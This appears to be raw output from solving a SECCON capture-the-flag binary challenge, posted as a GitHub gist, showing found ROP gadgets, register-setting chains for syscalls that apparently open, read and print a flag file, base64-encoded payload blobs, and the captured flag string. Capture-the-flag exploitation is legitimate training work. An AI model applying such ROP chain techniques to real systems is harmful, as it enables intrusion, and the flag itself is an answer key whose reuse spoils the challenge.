     val:                1
        :         5922861b
        : ffffffff11bac9bc
     rdi:           8000f4
     val:                1
        :         cda938ba
        : ffffffffc107d0f1
        :         3b69f994
        :         a0fd2742
     rsi:           800192
     val:           a00100
        : ffffffff6fdd238f
        :          29d402a
        :         a899f167
 syscall:           800006
        :        12dfe74c4
        : ffffffffec5d1f81
        :         3a96506f
        :         adb8e0dd
2QKAAAAAAAACAAAAAAAAABuGIlkAAAAAvMm6Ef/////0AIAAAAAAAAAAoAAAAAAAujipzQAAAADx0AfB/////5T5aTsAAAAAQif9oAAAAACSAYAAAAAAAAAAAAAAAAAAjyPdb/////8qQJ0CAAAAAGfxmagAAAAALwKAAAAAAAAAAAAAAAAAABh44Z4AAAAA/oZNCwEAAAAaLejQAAAAANwkfMYAAAAABgCAAAAAAADEdP4tAQAAAIEfXez/////b1CWOgAAAADd4LitAAAAAPMAgAAAAAAAujipzQAAAADx0AfB/////5T5aTsAAAAAQif9oAAAAADZAoAAAAAAAAAAAAAAAAAAG4YiWQAAAAC8yboR/////5IBgAAAAAAAAAGgAAAAAACPI91v/////ypAnQIAAAAAZ/GZqAAAAAAvAoAAAAAAAAABAAAAAAAAGHjhngAAAAD+hk0LAQAAABot6NAAAAAA3CR8xgAAAAAGAIAAAAAAAMR0/i0BAAAAgR9d7P////9vUJY6AAAAAN3guK0AAAAALgKAAAAAAAAYeOGeAAAAAP6GTQsBAAAAGi3o0AAAAADcJHzGAAAAANkCgAAAAAAAAQAAAAAAAAAbhiJZAAAAALzJuhH/////9ACAAAAAAAABAAAAAAAAALo4qc0AAAAA8dAHwf////+U+Wk7AAAAAEIn/aAAAAAAkgGAAAAAAAAAAaAAAAAAAI8j3W//////KkCdAgAAAABn8ZmoAAAAAAYAgAAAAAAAxHT+LQEAAACBH13s/////29QljoAAAAA3eC4rQAAAAA=

OK
stage
 5/5

encoded
9PT09PT09PReQV9Jge/nz39WSYHH20R8RUmB71lTCxFJgf/ORoIJdAL09EFcSYHEYONpUUmBxM5iBFxJgez2Cp4jSYH0fPr2bUmBxEadpXBJgfQQnewTSYH8scpyCXQG9PT09PT0w/T09PT09PT0UFpbSIHzg/byT0iB85gb6nlIgesZBqMpSIHr0BpfH0iBw5fCki1Iget2GLowSIHD/aiHQkiB63NihAxIgftwF1wVdAP09PTD9PT09PT0UF9BX0mB99DKLCZJgcdvnQ4aSYHv3LPdXEmB73dz8lBJgccgibR8SYH3gkeNB0mB73V/Kx9Jgf+xyKEpdAX09PT09EFfSYHHFZhtJ0mBx8vR7xxJgcdB9rB/SYH3P+3wFkmB97q37xtJge+zGFhwSYH3SHtEWEmB/3lOaEl0BPT09PTD9PT0DwVBXUmBxTprPFtJgf2floF0dAf09PT09PT0QVtJgfMOo9VYSYH7QKC6IXQF9PT09PRBX0mB71hEiFBJgcchNUU5SYH3e37RS0mB/7DHnGV0A/T09MP09PRYQV9JgceFOj0hSYHvrGAgJEmB9zZSvipJge8HQx8mSYH3Jqe6GEmBx559EgJJgf8bUs0kdAP09PRBXEmB9AABamVJgeyjZG9CSYHE4mZmZEmB9CWM7CRJgcQIMH95SYH0QijzakmB9JFpmRdJgfzDoNsTdAb09PT09PRBXkmB9jWHsAJJgcaOm3BHSYHG3wNzWUmBxiTpElVJgcZ81M8SSYHu/HXxFEmBxpnlK1lJgf4DixoidAT09PT0QVxJgfStmaBvSYHsrlNFCUmB/LbcFWV0AvT0QVtJgetz3H86SYHrr0mCdkmB8wX9XjFJgcNvxbQDSYHr1iFuO0mB87WLbD9JgfsQS4EmdAb09PT09PRBXUmBxfAr41NJgcVQ9RoLSYHFyZ5GX0mB9XjeeiVJgfWwFK8iSYH1XD79NUmB9XdsNm1Jgf2hphpBdAb09PT09PTD

[+] rsi gadgets found!
  gadget value is 0x2b912533
  gadget value is 0xffffffff3a3e04ef
[*] ret is found!
[+] rdx gadgets found!
  gadget value is 0x1d9aaab5
[*] ret is found!
[+] rdi gadgets found!
  gadget value is 0x4061dab8
  gadget value is 0xffffffffc88cb740
[*] ret is found!
[+] syscall gadgets found!
  gadget value is 0x19452b65
  gadget value is 0x796f034e
  gadget value is 0x4590c902
[*] ret is found!
[+] rax gadgets found!
  gadget value is 0x4d850a7b
  gadget value is 0xffffffffca8d3bee
  gadget value is 0xfffffffed7a9396c
  gadget value is 0x1fba9c9
  gadget value is 0x111fc062b
  gadget value is 0xffffffff5fbf7e39
[*] ret is found!
     rax:           80019d
     val:                2
        :         4d850a7b
        : ffffffffca8d3bee
        : fffffffed7a9396c
        :          1fba9c9
        :        111fc062b
        : ffffffff5fbf7e39
     rdi:           8000be
     val:           a00000
        :         4061dab8
        : ffffffffc88cb740
     rsi:           800008
     val:                0
        :         2b912533
        : ffffffff3a3e04ef
     rdx:           800070
     val:                0
        :         1d9aaab5
 syscall:           800144
        :         19452b65
        :         796f034e
        :         4590c902
     rdi:           8000bd
        :         4061dab8
        : ffffffffc88cb740
     rax:           80019d
     val:                0
        :         4d850a7b
        : ffffffffca8d3bee
        : fffffffed7a9396c
        :          1fba9c9
        :        111fc062b
        : ffffffff5fbf7e39
     rsi:           800008
     val:           a00100
        :         2b912533
        : ffffffff3a3e04ef
     rdx:           800070
     val:              100
        :         1d9aaab5
 syscall:           800144
        :         19452b65
        :         796f034e
        :         4590c902
     rdx:           80006f
        :         1d9aaab5
     rax:           80019d
     val:                1
        :         4d850a7b
        : ffffffffca8d3bee
        : fffffffed7a9396c
        :          1fba9c9
        :        111fc062b
        : ffffffff5fbf7e39
     rdi:           8000be
     val:                1
        :         4061dab8
        : ffffffffc88cb740
     rsi:           800008
     val:           a00100
        :         2b912533
        : ffffffff3a3e04ef
 syscall:           800144
        :         19452b65
        :         796f034e
        :         4590c902
nQGAAAAAAAACAAAAAAAAAHsKhU0AAAAA7juNyv////9sOanX/v///8mp+wEAAAAAKwb8EQEAAAA5fr9f/////74AgAAAAAAAAACgAAAAAAC42mFAAAAAAEC3jMj/////CACAAAAAAAAAAAAAAAAAADMlkSsAAAAA7wQ+Ov////9wAIAAAAAAAAAAAAAAAAAAtaqaHQAAAABEAYAAAAAAAGUrRRkAAAAATgNveQAAAAACyZBFAAAAAL0AgAAAAAAAuNphQAAAAABAt4zI/////50BgAAAAAAAAAAAAAAAAAB7CoVNAAAAAO47jcr/////bDmp1/7////JqfsBAAAAACsG/BEBAAAAOX6/X/////8IAIAAAAAAAAABoAAAAAAAMyWRKwAAAADvBD46/////3AAgAAAAAAAAAEAAAAAAAC1qpodAAAAAEQBgAAAAAAAZStFGQAAAABOA295AAAAAALJkEUAAAAAbwCAAAAAAAC1qpodAAAAAJ0BgAAAAAAAAQAAAAAAAAB7CoVNAAAAAO47jcr/////bDmp1/7////JqfsBAAAAACsG/BEBAAAAOX6/X/////++AIAAAAAAAAEAAAAAAAAAuNphQAAAAABAt4zI/////wgAgAAAAAAAAAGgAAAAAAAzJZErAAAAAO8EPjr/////RAGAAAAAAABlK0UZAAAAAE4Db3kAAAAAAsmQRQAAAAA=

OK
SECCON{d28d3afbf80463568d5f}

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment